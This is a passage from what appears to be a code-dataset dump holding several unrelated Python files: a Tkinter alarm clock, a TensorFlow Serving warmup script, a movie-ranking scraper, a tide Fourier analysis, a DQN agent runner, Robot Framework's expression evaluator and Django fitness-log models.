int(time.ctime()[11:13])\r\n        self.minutes = int(time.ctime()[14:16])\r\n        self.seconds = int(time.ctime()[17:19])\r\n        self.main_display()\r\n\r\n#Class for the GUI widgets \r\nclass AlarmWidgets(MainDisplay):\r\n    def alarm_widgets(self):\r\n        alarm_frame = Frame(self)\r\n        alarm_frame.grid(row = 0, column = 1, columnspan = 3)\r\n        \r\n        self.hour_set = ttk.Combobox(alarm_frame, values = self.hour_list, width = 10)\r\n        self.hour_set.set('Set Hour')\r\n        self.hour_set.grid(row = 0, column = 0, padx = 2, pady = 2, sticky = 'N')\r\n        \r\n        self.minute_set = ttk.Combobox(alarm_frame, values = self.minute_list, width = 10)\r\n        self.minute_set.set('Set Min.')\r\n        self.minute_set.grid(row = 0, column = 1, padx = 2, pady = 2, sticky = 'N')\r\n        \r\n        self.am_pm = ttk.Combobox(alarm_frame, values = ['AM', 'PM'], width = 5)\r\n        self.am_pm.set('AM')\r\n        self.am_pm.grid(row = 0, column = 3, padx = 2, pady = 2, sticky = 'N' )\r\n\r\n        self.set_alarm_btn = Button(self)\r\n        self.set_alarm_btn['text'] = 'Set Alarm'\r\n        self.set_alarm_btn['command'] = self.add_alarm\r\n        self.set_alarm_btn['bg'] = 'orange'\r\n        self.set_alarm_btn.grid(row = 1, column = 2, pady = 2, sticky = 'N')\r\n\r\n        self.song_list = ttk.Combobox(self)\r\n        self.song_list['width'] = 30\r\n        self.song_list.set('Song List')\r\n        \r\n        try:\r\n            with open(r'AlarmClock\\alarmclock.pkl', 'rb') as songadder:\r\n                song_adder = pickle.load(songadder)\r\n                self.song_list['values'] = [key for key in song_adder.keys()]\r\n        except FileNotFoundError:\r\n            pass\r\n        \r\n        self.song_list.grid(row = 2, column = 1, pady = 2, columnspan = 3, sticky = 'N')\r\n\r\n        self.add_song_btn = Button(self)\r\n        self.add_song_btn['text'] = 'Add URL'\r\n        self.add_song_btn['command'] = self.add_url\r\n        self.add_song_btn['bg'] = 'orange'\r\n        self.add_song_btn.grid(row = 6, column = 2, sticky = 'N')\r\n        \r\n        self.add_song_entry = Entry(self)\r\n        self.add_song_entry['width'] = 30\r\n        self.add_song_entry.insert(1, 'Enter URL')\r\n        self.add_song_entry.grid(row = 5, column = 1, columnspan = 3, padx = 2, sticky = 'N')\r\n\r\n        self.add_title_entry = Entry(self)\r\n        self.add_title_entry['width'] = 30\r\n        self.add_title_entry.insert(1, 'Enter URL Title')\r\n        self.add_title_entry.grid(row = 4, column = 1, columnspan = 3, padx = 2)\r\n        \r\n        remove_song_btn = Button(self)\r\n        remove_song_btn['text'] = 'Remove Song'\r\n        remove_song_btn['command'] = self.remove_song\r\n        remove_song_btn['bg'] = 'orange'\r\n        remove_song_btn.grid(row = 3, column = 2, sticky = 'N')\r\n\r\n#Class that sets/clears and adds URLS to the alarm feature\r\nclass AlarmSet(AlarmWidgets):\r\n    def add_alarm(self):\r\n        self.clock.delete('alarmtext')\r\n        self.clock.delete('titletext')\r\n        alarm_hours = int(self.hour_set.get())\r\n        alarm_minutes = int(self.minute_set.get())\r\n        alarm_ampm = self.am_pm.get()\r\n        \r\n        self.title_text = self.song_list.get()[:25]\r\n        self.alarm_text = 'Alarm: {}:{:02d}:00{}'.format(alarm_hours, alarm_minutes, alarm_ampm)\r\n        self.title_display = self.clock.create_text(89 + len(self.title_text), 230, fill = 'cyan', font = ('Verdana', 12), tag = 'titletext')\r\n        self.alarm_display = self.clock.create_text(105, 250, fill = 'cyan', font = ('Verdana', 15), tag = 'alarmtext')\r\n        self.clock.itemconfigure(self.title_display, text = self.title_text)\r\n        self.clock.itemconfigure(self.alarm_display, text = self.alarm_text)\r\n        \r\n        if alarm_ampm == 'PM' and alarm_hours != 12:\r\n            alarm_hours += 12\r\n        if alarm_ampm == 'AM' and alarm_hours == 12:\r\n            alarm_hours = 0 #12 AM maps to hour 0 in 24-hour time\r\n        \r\n        #seconds until the alarm (3600 seconds per hour), scaled to ms for master.after\r\n        alarm_time = abs(((alarm_hours * 3600 + alarm_minutes * 60) - (self.hours * 3600 + self.minutes * 60) - self.seconds) * 
1000)\r\n \r\n self.master.after(alarm_time, self._start_alarm)\r\n self.set_alarm_btn['text'] = 'Clear Alarm'\r\n self.set_alarm_btn['command'] = self.clear_alarm\r\n \r\n def _start_alarm(self):\r\n with open(r'AlarmClock\\alarmclock.pkl', 'rb') as alarmurl:\r\n alarm_url = pickle.load(alarmurl)\r\n\r\n#Checks if there is any text on the Canvas, if so it engages the alarm, if not (alarm was cleared) it doesnt engage the alarm \r\n if self.clock.find_withtag('titletext'):\r\n song_url = alarm_url[self.song_list.get()]\r\n webbrowser.open(url = song_url, autoraise = True) \r\n \r\n def clear_alarm(self):\r\n self.clock.delete(\"alarmtext\") \r\n self.clock.delete('titletext')\r\n self.hour_set.set('Set Hour')\r\n self.minute_set.set('Set Min.')\r\n self.am_pm.set('AM')\r\n self.song_list.set('Song List')\r\n \r\n self.set_alarm_btn['text'] = 'Add Alarm'\r\n self.set_alarm_btn['command'] = self.add_alarm\r\n\r\n def add_url(self):\r\n title_song_dict = {}\r\n add_url = self.add_song_entry.get()\r\n add_title = self.add_title_entry.get()\r\n title_song_dict.setdefault(add_title, add_url)\r\n \r\n try:\r\n with open(r'AlarmClock\\alarmclock.pkl', 'rb') as songadder:\r\n song_adder = pickle.load(songadder)\r\n \r\n for key, value in song_adder.items():\r\n title_song_dict.setdefault(key, value)\r\n except FileNotFoundError:\r\n pass \r\n\r\n with open(r'AlarmClock\\alarmclock.pkl', 'wb') as songadder:\r\n pickle.dump(title_song_dict, songadder, pickle.HIGHEST_PROTOCOL)\r\n \r\n with open(r'AlarmClock\\alarmclock.pkl', 'rb') as songadder:\r\n song_adder = pickle.load(songadder)\r\n\r\n self.song_list['values'] = [key for key in song_adder.keys()]\r\n \r\n self.add_song_btn['text'] = 'Clear Url'\r\n self.add_song_btn['command'] = self.clear_url\r\n\r\n def clear_url(self):\r\n self.add_song_entry.delete(0, END)\r\n self.add_title_entry.delete(0, END)\r\n self.add_song_entry.insert(1, 'Enter Url')\r\n self.add_title_entry.insert(1, 'Enter Title')\r\n self.add_song_btn['text'] = 'Add Url'\r\n self.add_song_btn['command'] = self.add_url\r\n\r\n def remove_song(self):\r\n song_selection = self.song_list.get()\r\n \r\n with open(r'AlarmClock\\alarmclock.pkl', 'rb') as reader:\r\n reader_lines = pickle.load(reader)\r\n if song_selection in reader_lines:\r\n del reader_lines[song_selection]\r\n \r\n with open(r'AlarmClock\\alarmclock.pkl', 'wb') as reader:\r\n pickle.dump(reader_lines, reader, pickle.HIGHEST_PROTOCOL) \r\n \r\n self.song_list['values'] = list(reader_lines.keys())\r\n self.song_list.set('Song List')\r\n\r\nroot = Tk()\r\nbailey = AlarmSet(master = root)\r\nroot.mainloop()\r\n","sub_path":"alarmclock.py","file_name":"alarmclock.py","file_ext":"py","file_size_in_byte":9244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"33704930","text":"#! 
/usr/bin/env python\n# -*-coding=utf8-*-\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\nfrom tensorflow_serving.apis import classification_pb2\nfrom tensorflow_serving.apis import inference_pb2\nfrom tensorflow_serving.apis import model_pb2\nfrom tensorflow_serving.apis import predict_pb2\nfrom tensorflow_serving.apis import prediction_log_pb2\nfrom tensorflow_serving.apis import regression_pb2\n\n\nMODEL_NAME = \"easyctr\"\nuser_feature = [\"\"]\nitem_features = [\"\"]\nctx_features = [\"\"]\n\n\ndef _bytes_feature(value):\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=value))\n\n\ndef _int64_feature(value):\n return tf.train.Feature(int64_list=tf.train.Int64List(value=value))\n\n\ndef _float_feature(value):\n return tf.train.Feature(float_list=tf.train.FloatList(value=value))\n\n\n# see https://www.tensorflow.org/tfx/serving/saved_model_warmup\ndef main():\n with tf.python_io.TFRecordWriter(\"tf_serving_warmup_requests\") as writer:\n # replace with one of:\n # predict_pb2.PredictRequest(..)\n # classification_pb2.ClassificationRequest(..)\n # regression_pb2.RegressionRequest(..)\n # inference_pb2.MultiInferenceRequest(..)\n\n request = predict_pb2.PredictRequest()\n request.model_spec.name = MODEL_NAME\n\n request.model_spec.signature_name = 'serving_default'\n input_name = 'inputs'\n example1 = tf.train.Example(\n features=tf.train.Features(\n feature={\n 'user_feature': _bytes_feature(user_feature),\n 'ctx_features': _bytes_feature(ctx_features),\n 'item_features': _bytes_feature(item_features),\n }\n )\n ).SerializeToString()\n print(\"example len = {}\".format(len(example1)))\n examples = [example1]\n request.inputs[input_name].CopyFrom(\n tf.contrib.util.make_tensor_proto(examples, dtype=tf.string))\n log = prediction_log_pb2.PredictionLog(\n predict_log=prediction_log_pb2.PredictLog(request=request))\n writer.write(log.SerializeToString())\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"models/generate_warmup_file.py","file_name":"generate_warmup_file.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"160917387","text":"# -*- coding: utf-8 -*-\r\n\r\n# https://movie.naver.com/movie/sdb/rank/rmovie.nhn \r\n# 으로부터 영화 랭킹 정보를 수집하세요\r\n\"\"\"\r\n1. 사바하\r\n2. 증인\r\n3. 
극한직업\r\n...\r\n\"\"\"\r\nimport urllib.request as req\r\nfrom bs4 import BeautifulSoup as bs\r\n\r\nurl = \"https://movie.naver.com/movie/sdb/rank/rmovie.nhn\"\r\nhtml = req.urlopen(url)\r\nsoup = bs(html, 'html.parser') \r\n\r\n#print(soup)\r\ntarget = soup.find_all(\"div\", \r\n attrs={\"class\":\"tit3\"},\r\n limit=10)\r\n\r\nfor index, data in enumerate(target) :\r\n data = str(data.text) \r\n# if index < 10 :\r\n print(f\"{index + 1} : {data.strip()}\")\r\n# else :\r\n# break\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n ","sub_path":"day_09/crawling_05_example.py","file_name":"crawling_05_example.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"62103306","text":"import pandas as pd\nfrom pathlib import Path\nimport datetime\n\npath = str(Path(__file__).parents[2])+\"/materials/esercizi/steps2020.xlsx\"\n\n\ndf = pd.read_excel(path, parse_dates={'TEMPO' : [\"Date\", \"Time\"]}, index_col=\"TEMPO\")\nprint(df)\nts_max = pd.Timestamp(\"2020-01-15 23:59:00\")\nstep_max = df.loc[\"2020-01-15 23:59:00\"]\ndfr=pd.DataFrame({\"TEMPO\": ts_max, \"Steps\": step_max})\ndfr.set_index(keys=\"TEMPO\")\nprint(dfr.transpose())\n\n\n\n\n\n\n","sub_path":"venv/src/solution7.py","file_name":"solution7.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"462750372","text":"import sys\nimport getopt\nimport numpy as np\nimport pandas\nfrom matplotlib import pyplot as plt\nfrom datetime import datetime\nimport csv\n\n\ndef read_file():\n mareas = pandas.read_csv('CO-OPS_8410140_met-2019.csv')\n alturas_totales = mareas['Verified (m)']\n\n alturas_semana_1_enero = alturas_totales[0:168]\n alturas_semana_2_enero = alturas_totales[169:336]\n alturas_ene_feb = alturas_totales[0:1416]\n alturas_mar_abr = alturas_totales[1417:2880]\n return [\n alturas_totales,\n alturas_semana_1_enero,\n alturas_semana_2_enero,\n alturas_ene_feb,\n alturas_mar_abr\n ]\n\n\n\n\ndef store_fft_data(indices, absolutes, angles, output):\n output.writerow([\"Indice\", \"Abs\", \"Angle\"])\n for i in indices:\n output.writerow([i, absolutes[i], angles[i]])\n\n\ndef ak(a_k, f_k):\n return a_k * np.cos(f_k)\n\n\ndef bk(b_k, f_k):\n return -b_k * np.sin(f_k)\n\n\ndef serie_fourier_altura(t, ind, amp, fases, w_0, output, save_data):\n if (save_data is True):\n output.writerow([\"k\", \"O_k\", \"Q_k\", \"A_k\", \"B_k\"])\n acc = 0\n for k in ind:\n a_k = ak(amp[k], fases[k])\n b_k = bk(amp[k], fases[k])\n\n if (save_data is True):\n output.writerow([k, amp[k], fases[k], a_k, b_k])\n\n acc = (a_k * np.cos(w_0 * k * t)) + (b_k * np.sin(w_0 * k * t)) + acc\n\n return acc\n\n\ndef procesar_rango(alturas, n_armonicos, save_data):\n # open files\n fft_writer = None\n sft_writer = None\n if (save_data is True):\n now = int(datetime.now().timestamp())\n fft_file = open(f'resultados/fft_csv_file_{now}.csv', 'w')\n sft_file = open(f'resultados/sft_csv_file_{now}.csv', 'w')\n fft_writer = csv.writer(fft_file)\n sft_writer = csv.writer(sft_file)\n\n # Parametros\n T = len(alturas)\n t = range(0, int(T))\n omega_0 = (2 * np.pi) / T\n\n W = int(T/2)\n\n # Obtencion de la transformada\n alturas_fft = np.fft.fft(alturas)\n h_alturas_fft = np.abs(alturas_fft)\n a_alturas_fft = np.angle(alturas_fft)\n h_alturas_fft_normalizadas = h_alturas_fft / W\n\n # Normalizamos a parte el valor medio, dado que se repite en la muestra\n h_alturas_fft_normalizadas[0] = 
h_alturas_fft_normalizadas[0]/2\n\n # Seleccion de los armonicos utilizamos solo la mitad de la muestra\n mitad = h_alturas_fft_normalizadas[0:W]\n maximos = np.flip(np.sort(mitad))[0:n_armonicos]\n h_alturas_fft_filtrados = np.where(\n mitad < np.min(maximos),\n 0,\n mitad)\n indices_elementos_filtrados = np.nonzero(h_alturas_fft_filtrados)[0]\n\n # Guardamos los datos de la corrida.\n if (save_data is True):\n store_fft_data(\n indices_elementos_filtrados,\n h_alturas_fft,\n a_alturas_fft,\n fft_writer\n )\n\n # Calculo de las alturas.\n sf_alturas = serie_fourier_altura(\n t,\n indices_elementos_filtrados,\n h_alturas_fft_normalizadas,\n a_alturas_fft,\n omega_0,\n sft_writer,\n save_data\n )\n\n # Error cuadratico medio.\n ecm = np.mean((np.abs(alturas - sf_alturas)**2))\n print(\"ECM: \", ecm)\n\n # Dibujamos las alturas medidas y las alturas estimadas.\n plt.plot(t, sf_alturas, 'r-', t, alturas, 'b--')\n plt.show()\n\n\ndef usage():\n print('\\nUso:')\n print('\\tmain.py -p
<P> -n -s')\n    print('\tmain.py --punto <P>
--armonicos --save')\n print('\\nN = cantidad de armonicos (default: 15)')\n print('P = punto del tp (default: el set completo)\\n')\n print('Puntos:')\n print('\\t1: Set completo')\n print('\\t2: Primera semana de enero')\n print('\\t3: Segunda semana de enero')\n print('\\t4: Enero y febrero')\n print('\\t5: Marzo y abril')\n\n\ndef main(argv):\n point = 0\n n_armonicos = 15\n save_data = False\n try:\n opts, args = getopt.getopt(argv, \"hp:n:s\", ['punto=', 'armonicos=', 'save='])\n print(opts, args)\n except getopt.GetoptError:\n usage()\n sys.exit(2)\n for opt, arg in opts:\n if opt == '-h':\n usage()\n sys.exit()\n elif opt in (\"-s\", \"--save\"):\n save_data = True\n elif opt in (\"-p\", \"--punto\"):\n try:\n value = int(arg)\n if ((value < 1) or (value > 5)):\n raise ValueError\n else:\n point = value - 1\n except ValueError:\n print('-p tiene que ser un numero entre 1 y 5')\n usage()\n sys.exit(2)\n elif opt in (\"-n\", \"--armonicos\"):\n try:\n n_armonicos = int(arg)\n except ValueError:\n print('-n tiene que ser un numero entero')\n usage()\n sys.exit(2)\n\n print('Save data', save_data)\n ranges = read_file()\n procesar_rango(ranges[point], n_armonicos, save_data)\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"525090322","text":"import argparse\nfrom collections import deque \nimport numpy as np\nimport sys\nimport os\nimport torch \n\n# import environment \nsys.path.append('../python/')\nfrom unityagents import UnityEnvironment\nenv = UnityEnvironment(file_name=\"Banana_Windows_x86_64/Banana.exe\")\nbrain_name = env.brain_names[0]\nbrain = env.brains[brain_name]\n\n# import models and agents\nfrom models import QNetwork, DuelingQNetwork\nfrom agents import DQNAgent, DDQNAgent\n\n\ndef run(agent, name):\n \"\"\"\n Run simulation\n \n Params\n ======\n agent (object): Agent to train\n name (string): name of agent for loading model parameters\n \"\"\"\n # Load model parameters into agent\n checkpoint = torch.load('{}_checkpoint.pth'.format(name))\n agent.qnetwork_local.load_state_dict(checkpoint)\n \n # Begin simulation\n env_info = env.reset(train_mode=False)[brain_name] # reset the environment\n state = env_info.vector_observations[0] # get the current state\n score = 0 # initialize the score\n while True:\n action = np.int32(agent.act(state, 0)) # select an action (setting epsilon to zero)\n env_info = env.step(action)[brain_name] # send the action to the environment\n next_state = env_info.vector_observations[0] # get the next state\n reward = env_info.rewards[0] # get the reward\n done = env_info.local_done[0] # see if episode has finished\n score += reward # update the score\n state = next_state # roll over the state to next time step\n if done: # exit loop if episode finished\n break\n \n print(\"Score: {}\".format(score))\n\n \nif __name__ == \"__main__\":\n \n # Set up arguement parser\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-ddqn\", \"--double_dqn\", help=\"Boolean - Whether to use double deep Q network\")\n parser.add_argument(\"-duel\", \"--duelling\", help=\"Boolean - Whether to use duelling architecture\")\n args = parser.parse_args()\n \n # Set default parameters\n if args.double_dqn == 'True':\n args.double_dqn = True\n else: \n args.double_dqn = False\n if args.duelling == 'True':\n args.duelling = True\n else: \n args.duelling = False\n\n 
print(\"Double DQN {}, Duelling Architecture {}\".format(args.double_dqn, args.duelling))\n \n # instantiate appropriate agent\n if (args.double_dqn is True) & (args.duelling is True):\n agent = DDQNAgent(state_size=37, action_size=4, model=DuelingQNetwork, seed=0)\n agent_name = 'duel_ddqn'\n \n elif (args.double_dqn is True) & (args.duelling is False):\n agent = DDQNAgent(state_size=37, action_size=4, model=QNetwork, seed=0)\n agent_name = 'ddqn'\n \n elif (args.double_dqn is False) & (args.duelling is True):\n agent = DQNAgent(state_size=37, action_size=4, model=DuelingQNetwork, seed=0)\n agent_name = 'duel_dqn'\n \n else:\n agent = DQNAgent(state_size=37, action_size=4, model=QNetwork, seed=0)\n agent_name = 'dqn'\n \n # Run simulation with specified agent\n print('Running simulation with {} agent'.format(agent_name))\n run(agent, agent_name)\n env.close()\n\n","sub_path":"Navigation/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":3353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"494015126","text":"# Copyright 2008-2015 Nokia Networks\n# Copyright 2016- Robot Framework Foundation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom tokenize import generate_tokens, untokenize\nimport token\n\nfrom robot.errors import DataError\nfrom robot.utils import (get_error_message, is_string, MutableMapping, PY2,\n StringIO, type_name)\n\nfrom .notfound import variable_not_found\n\n\nif PY2:\n import __builtin__ as builtins\nelse:\n import builtins\nPYTHON_BUILTINS = set(builtins.__dict__)\n\n\ndef evaluate_expression(expression, variable_store, modules=None,\n namespace=None):\n try:\n if not is_string(expression):\n raise TypeError(\"Expression must be string, got %s.\"\n % type_name(expression))\n if not expression:\n raise ValueError(\"Expression cannot be empty.\")\n return _evaluate(expression, variable_store, modules, namespace)\n except:\n raise DataError(\"Evaluating expression '%s' failed: %s\"\n % (expression, get_error_message()))\n\n\ndef _evaluate(expression, variable_store, modules=None, namespace=None):\n if '$' in expression:\n expression = _decorate_variables(expression, variable_store)\n # Given namespace must be included in our custom local namespace to make\n # it possible to detect which names are not found and should be imported\n # automatically as modules. 
It must be also be used as the global namespace\n # with `eval()` because lambdas and possibly other special constructs don't\n # see the local namespace at all.\n namespace = dict(namespace) if namespace else {}\n if modules:\n namespace.update(_import_modules(modules))\n local_ns = EvaluationNamespace(variable_store, namespace)\n return eval(expression, namespace, local_ns)\n\n\ndef _decorate_variables(expression, variable_store):\n variable_started = False\n variable_found = False\n tokens = []\n for toknum, tokval, _, _, _ in generate_tokens(StringIO(expression).readline):\n if variable_started:\n if toknum == token.NAME:\n if tokval not in variable_store:\n variable_not_found('$%s' % tokval,\n variable_store.as_dict(decoration=False),\n deco_braces=False)\n tokval = 'RF_VAR_' + tokval\n variable_found = True\n else:\n tokens.append((token.ERRORTOKEN, '$'))\n variable_started = False\n if toknum == token.ERRORTOKEN and tokval == '$':\n variable_started = True\n else:\n tokens.append((toknum, tokval))\n return untokenize(tokens).strip() if variable_found else expression\n\n\ndef _import_modules(module_names):\n modules = {}\n for name in module_names.replace(' ', '').split(','):\n if not name:\n continue\n modules[name] = __import__(name)\n # If we just import module 'root.sub', module 'root' is not found.\n while '.' in name:\n name, _ = name.rsplit('.', 1)\n modules[name] = __import__(name)\n return modules\n\n\n# TODO: In Python 3 this could probably be just Mapping, not MutableMapping.\n# With Python 2 at least list comprehensions need to mutate the evaluation\n# namespace. Using just Mapping would allow removing __set/delitem__.\nclass EvaluationNamespace(MutableMapping):\n\n def __init__(self, variable_store, namespace):\n self.namespace = namespace\n self.variables = variable_store\n\n def __getitem__(self, key):\n if key.startswith('RF_VAR_'):\n return self.variables[key[7:]]\n if key in self.namespace:\n return self.namespace[key]\n return self._import_module(key)\n\n def _import_module(self, name):\n if name in PYTHON_BUILTINS:\n raise KeyError\n try:\n return __import__(name)\n except ImportError:\n raise NameError(\"name '%s' is not defined nor importable as module\"\n % name)\n\n def __setitem__(self, key, value):\n if key.startswith('RF_VAR_'):\n self.variables[key[7:]] = value\n else:\n self.namespace[key] = value\n\n def __delitem__(self, key):\n if key.startswith('RF_VAR_'):\n del self.variables[key[7:]]\n else:\n del self.namespace[key]\n\n def __iter__(self):\n for key in self.variables:\n yield key\n for key in self.namespace:\n yield key\n\n def __len__(self):\n return len(self.variables) + len(self.namespace)\n","sub_path":"src/robot/variables/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":5150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"645271494","text":"import datetime\n\nfrom cloudinary.models import CloudinaryField\nfrom django.contrib.auth import get_user_model\nfrom django.db import models\nfrom django_cryptography.fields import encrypt\nfrom django_measurement.models import MeasurementField\nfrom pinax.referrals.models import Referral\nfrom safedelete.models import SafeDeleteModel\n\nfrom .base_models import DateTimeFields, Distance, Weight\nfrom pinax.referrals.models import Referral\nfrom cloudinary.models import CloudinaryField\nimport uuid\n\n\nclass CoachClient(DateTimeFields):\n \"\"\"docstring for Feedback.\"\"\"\n\n coach = models.ForeignKey(\n 
get_user_model(), on_delete=models.CASCADE, related_name=\"coach\")\n\n client = models.ForeignKey(\n get_user_model(), on_delete=models.CASCADE, related_name=\"client\")\n\n\nclass AnalyticsShareToken(DateTimeFields, SafeDeleteModel):\n \"\"\"docstring for Feedback.\"\"\"\n\n user = models.OneToOneField(get_user_model(), on_delete=models.CASCADE)\n uuid = models.UUIDField(default=uuid.uuid4)\n\n\ndef get_default_goal_date():\n return datetime.datetime.today() + datetime.timedelta(days=30)\n\n\ndef get_default_goal_mfp_autosync_startdate():\n return datetime.datetime.today() - datetime.timedelta(days=90)\n\n\nclass Wallet(DateTimeFields, SafeDeleteModel):\n \"\"\"docstring for Feedback.\"\"\"\n\n user = models.OneToOneField(get_user_model(), on_delete=models.CASCADE)\n coins = models.IntegerField(default=0)\n\n def __str__(self):\n return f\"Wallet from {self.user}: {self.coins}\"\n\n\nclass MFPCredentials(DateTimeFields, SafeDeleteModel):\n \"\"\"docstring for Feedback.\"\"\"\n\n user = models.OneToOneField(get_user_model(), on_delete=models.CASCADE)\n username = models.CharField(max_length=255)\n password = encrypt(models.CharField(max_length=255))\n mfp_autosync = models.BooleanField(default=False)\n mfp_autosync_startdate = models.DateTimeField(\n default=get_default_goal_mfp_autosync_startdate,\n blank=True,\n )\n last_mfp_log_date_synced = models.DateTimeField(null=True, blank=True)\n\n def __str__(self):\n return f\"MFPCredentials from {self.user}\"\n\n\nclass Feedback(DateTimeFields, SafeDeleteModel):\n \"\"\"docstring for Feedback.\"\"\"\n\n user = models.ForeignKey(get_user_model(), on_delete=models.CASCADE)\n comment = models.TextField()\n contact_email = models.EmailField()\n\n def __str__(self):\n return f\"Feedback from {self.user}: {self.comment[0:10]}\"\n\n\nclass Subscription(DateTimeFields, SafeDeleteModel):\n \"\"\"docstring for Subscription.\"\"\"\n\n user = models.OneToOneField(get_user_model(), on_delete=models.CASCADE)\n\n choices = [\n (\"F\", \"Free\"),\n (\"B\", \"Bronze\"),\n (\"S\", \"Silver\"),\n (\"G\", \"Gold\"),\n (\"P\", \"Platinum\"),\n ]\n type = models.CharField(\n max_length=1, choices=choices, default=\"Free\", blank=True, null=True\n )\n expires = models.DateTimeField(null=True, blank=True)\n\n\nclass Streak(DateTimeFields, SafeDeleteModel):\n \"\"\"\n Represents the user streaks\n \"\"\"\n\n user = models.OneToOneField(get_user_model(), on_delete=models.CASCADE)\n\n input_streak = models.IntegerField(\n default=0\n ) # Amount of days the user has in succession inputed data\n defecit_streak = models.IntegerField(\n default=0\n ) # Amount of days in succession that the user has a caloric defecit\n surplus_streak = models.IntegerField(\n default=0\n ) # Amount of days in succession that the user has a caloric surplus\n\n def actualize_input_streak(self):\n \"\"\"\n Actualizes the input streak via counting the consecutive log entries\n \"\"\"\n\n logs = self.user.log_set.all().order_by(\"date\")\n streak = 0\n last_log = None\n\n for log in logs:\n if last_log is None:\n last_log = log\n continue\n\n if (log.date - last_log.date).days <= 1:\n streak += 1\n else:\n streak = 0\n\n last_log = log\n\n self.input_streak = streak\n self.save()\n\n\nclass Setting(DateTimeFields, SafeDeleteModel):\n \"\"\"\n - Age\n - Sex/gender\n - Height\n - Perceived activity level\n - Goal - maintain, lose, gain\n - Goal weight\n - Goal date - by when?\n \"\"\"\n\n user = models.OneToOneField(\n get_user_model(), unique=True, blank=False, null=False, 
on_delete=models.CASCADE\n )\n\n age = models.IntegerField(blank=True, null=True, default=30)\n\n sex_choices = [\n (\"M\", \"Male\"),\n (\"F\", \"Female\"),\n ]\n\n sex = models.CharField(\n max_length=1, choices=sex_choices, blank=True, null=True, default=\"M\"\n )\n height = MeasurementField(\n measurement=Distance, null=True, blank=True, default=Distance(m=1.75)\n ) # height in metres\n\n activity_choices = [\n (\"1\", \"Sedentary (little or no exercise)\"),\n (\"2\", \"Lightly active (light exercise/sports 1-3 days/week)\"),\n (\"3\", \"Moderately active (moderate exercise/sports 3-5 days/week)\"),\n (\"4\", \"Very active (hard exercise/sports 6-7 days a week)\"),\n (\"5\", \"Extra active (very hard exercise/sports & physical job or 2x training)\"),\n ]\n activity = models.CharField(\n max_length=1,\n choices=activity_choices,\n blank=True,\n null=True,\n help_text=\"Used to estimate your total daily energy expenditure until we have enough data to calculate it\",\n default=\"1\",\n )\n\n goal_choices = [\n (\"L\", \"Lose\"),\n (\"M\", \"Maintain\"),\n (\"G\", \"Gain\"),\n ]\n goal = models.CharField(\n max_length=1,\n choices=goal_choices,\n blank=True,\n null=True,\n help_text=\"Do you want to lose, maintain, or gain weight?\",\n default=\"M\",\n )\n\n goal_weight = MeasurementField(\n measurement=Weight, null=True, blank=True, default=Weight(kg=80)\n ) # default weight is in kg\n goal_date = models.DateTimeField(\n blank=True, null=True, default=get_default_goal_date\n )\n unit_choices = [\n (\"I\", \"Imperial (pounds, feet, inches etc.)\"),\n (\"M\", \"Metric (kgs, meters, centimeters etc.)\"),\n ]\n unit_preference = models.CharField(\n max_length=1,\n choices=unit_choices,\n blank=True,\n null=True,\n help_text=\"Display metric or imperial units on analytics page\",\n default=\"M\",\n )\n\n @property\n def time_to_goal(self):\n # Returns int days until goal_date\n return (self.goal_date - datetime.datetime.now(datetime.timezone.utc)).days\n\n def __str__(self):\n return f\"Settings from {self.user}\"\n\n\nclass Image(DateTimeFields, SafeDeleteModel):\n\n Image = CloudinaryField(\"image\")\n # TODO: make this an optional foreign key to Log\n\n\nclass Log(DateTimeFields, SafeDeleteModel):\n \"\"\"\n - Date\n - Weight\n - Calories In\n - Calories Out\n - Activity LVL\n - progress pic\n \"\"\"\n\n class Meta:\n unique_together = (\"user\", \"date\")\n\n user = models.ForeignKey(\n get_user_model(),\n blank=False,\n null=False,\n on_delete=models.CASCADE,\n )\n\n date = models.DateField(blank=False) # Log the date\n\n weight = MeasurementField(measurement=Weight, null=True, blank=False)\n\n calories_in = models.IntegerField(\n blank=False,\n help_text=\"Total calories consumed\",\n ) # Calories consumed in kcal\n\n calories_out = models.IntegerField(\n blank=True,\n null=True,\n help_text=\"If you have a fitness tracker, total calories burned\",\n ) # From fitness tracker e.g.
